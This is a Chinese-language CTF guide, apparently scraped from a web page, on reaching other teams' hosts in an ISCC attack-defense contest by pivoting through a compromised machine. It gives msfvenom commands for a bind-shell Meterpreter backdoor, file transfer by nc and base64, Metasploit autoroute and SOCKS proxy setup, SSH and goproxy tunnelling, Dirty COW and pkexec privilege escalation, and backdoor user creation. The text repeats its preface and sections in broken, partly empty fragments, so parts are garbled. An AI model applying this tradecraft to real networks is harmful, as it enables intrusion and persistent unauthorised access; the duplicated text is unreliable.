ISCC线下赛代理配置与内网攻击技术指南<\/h1>

前言<\/h2>
本文档详细讲解在ISCC线下赛中如何配置代理攻击其他私地及高地的技术方法。针对比赛中常见的"有exp但无法攻击得分"的情况，提供完整的解决方案。<\/p>

网络环境分析<\/h2>

典型ISCC线下赛网络拓扑包含以下机器：<\/p>

Windows（宿主机）<\/strong>: 192.168.10.5<\/li>

kali（代理机\/攻击机）<\/strong>:

192.168.138.133<\/li>
192.168.222.130<\/li> <\/ul> <\/li>
Ubuntu（私地）<\/strong>:

192.168.222.132<\/li>
192.168.234.132<\/li> <\/ul> <\/li>
Ubuntu（其他私地\/高地）<\/strong>: 192.168.234.134<\/li> <\/ul>
网络限制条件<\/strong>：<\/p>

本机可直接访问私地，但不能直接访问其他私地和高地<\/li>
私地服务器不能回连攻击机<\/li>
所有私地服务器在同一C段（可先扫描存活主机）<\/li>
高地服务器不与私地在同一网段<\/li>
自己的两个私地服务器可互相访问<\/li> <\/ol>
攻击流程详解<\/h2>
1. MSF生成后门<\/h3>
由于私地不能回连攻击机，需生成正向后门：<\/p>
msfvenom -p linux\/x64\/meterpreter\/bind_tcp LPORT=<\/span>6677<\/span> -f elf > msf <\/span><\/span><\/code><\/pre>2. 后门传输到私地<\/h3> Web服务器传输方法：<\/h4> 直接上传文件<\/li> 使用wget\/curl下载<\/li> <\/ul> Pwn服务器传输方法（只有\/bin\/sh）：<\/h4> 先建立完整shell终端：<\/li> <\/ol> python3 -c 'import pty;pty.spawn("\/bin\/bash")'<\/span> <\/span><\/span><\/code><\/pre> 使用echo写入文件（大文件需分块）：<\/li> <\/ol> cat msf | base64 > 1.txt # 将文件base64编码<\/span> <\/span><\/span>echo "base64内容"<\/span> > file # 写入文件<\/span> <\/span><\/span>base64 -d file > msf # 解码还原文件<\/span> <\/span><\/span><\/code><\/pre> 使用nc传输：<\/li> <\/ol> # 接收端<\/span> <\/span><\/span>nc -l -p 1234<\/span> > msf <\/span><\/span> <\/span><\/span># 发送端<\/span> <\/span><\/span>nc -w 3<\/span> [<\/span>目标IP]<\/span> 1234<\/span> < msf <\/span><\/span><\/code><\/pre>3. MSF上线与代理配置<\/h3> 启动handler：<\/li> <\/ol> use exploit\/multi\/handler <\/span><\/span>set payload linux\/x64\/meterpreter\/bind_tcp <\/span><\/span>set LPORT 6677<\/span> <\/span><\/span>set RHOST 192.168.222.132 # 私地地址<\/span> <\/span><\/span>run <\/span><\/span><\/code><\/pre> 进程迁移（提高稳定性）：<\/li> <\/ol> ps <\/span><\/span>migrate [<\/span>PID]<\/span> # 选择系统进程注入<\/span> <\/span><\/span><\/code><\/pre> 添加路由表：<\/li> <\/ol> run post\/multi\/manage\/autoroute <\/span><\/span>run autoroute -p # 查看路由表<\/span> <\/span><\/span><\/code><\/pre> 配置SOCKS代理：<\/li> <\/ol> use auxiliary\/server\/socks_proxy <\/span><\/span>set session 1<\/span> <\/span><\/span>set SRVPORT 1080<\/span> <\/span><\/span>set VERSION 5<\/span> <\/span><\/span>run <\/span><\/span><\/code><\/pre> 宿主机使用Proxifier连接kali的1080端口<\/li> <\/ol> 4. 访问其他网段机器<\/h3> 配置完成后，可通过代理访问其他私地和高地服务器（如192.168.234.0\/24网段）<\/p> 替代方法<\/h2> SSH端口转发<\/h3> ssh -D 1080<\/span> user@[<\/span>跳板机IP]<\/span> <\/span><\/span><\/code><\/pre>使用goproxy工具<\/h3> # 上传goproxy到目标机器<\/span> <\/span><\/span>.\/goproxy -S :1080 <\/span><\/span><\/code><\/pre>注意事项<\/h2> 提权建议<\/h3> Ubuntu 16.04可使用脏牛漏洞提权<\/li> CVE-2021-4034 (pkexec漏洞)也可尝试<\/li> 提前准备离线提权工具<\/li> <\/ul> 连接稳定性<\/h3> 创建后门用户防止session丢失<\/li> 部署通防保护自身环境<\/li> 多建立几个备用session<\/li> <\/ol> 其他技巧<\/h3> 先扫描整个内网存活主机<\/li> 保持多个访问途径<\/li> 重要操作前备份环境<\/li> <\/ol> 通过以上方法，可以有效解决ISCC线下赛中"有exp但无法攻击"的问题，实现对其他私地和高地的攻击。<\/p>

ISCC线下赛代理配置与内网攻击技术指南<\/h1>

前言<\/h2> 本文档详细讲解在ISCC线下赛中如何配置代理攻击其他私地及高地的技术方法。针对比赛中常见的"有exp但无法攻击得分"的情况，提供完整的解决方案。<\/p>

攻击流程详解<\/h2>

2. 后门传输到私地<\/h3>

4. 访问其他网段机器<\/h3> 配置完成后，可通过代理访问其他私地和高地服务器（如192.168.234.0\/24网段）<\/p>

替代方法<\/h2>

注意事项<\/h2>

其他技巧<\/h3> 先扫描整个内网存活主机<\/li> 保持多个访问途径<\/li> 重要操作前备份环境<\/li> <\/ol> 通过以上方法，可以有效解决ISCC线下赛中"有exp但无法攻击"的问题，实现对其他私地和高地的攻击。<\/p>

前言<\/h2>
本文档详细讲解在ISCC线下赛中如何配置代理攻击其他私地及高地的技术方法。针对比赛中常见的"有exp但无法攻击得分"的情况，提供完整的解决方案。<\/p>

4. 访问其他网段机器<\/h3>
配置完成后，可通过代理访问其他私地和高地服务器（如192.168.234.0\/24网段）<\/p>

其他技巧<\/h3>

先扫描整个内网存活主机<\/li>
保持多个访问途径<\/li>
重要操作前备份环境<\/li> <\/ol>
通过以上方法，可以有效解决ISCC线下赛中"有exp但无法攻击"的问题，实现对其他私地和高地的攻击。<\/p>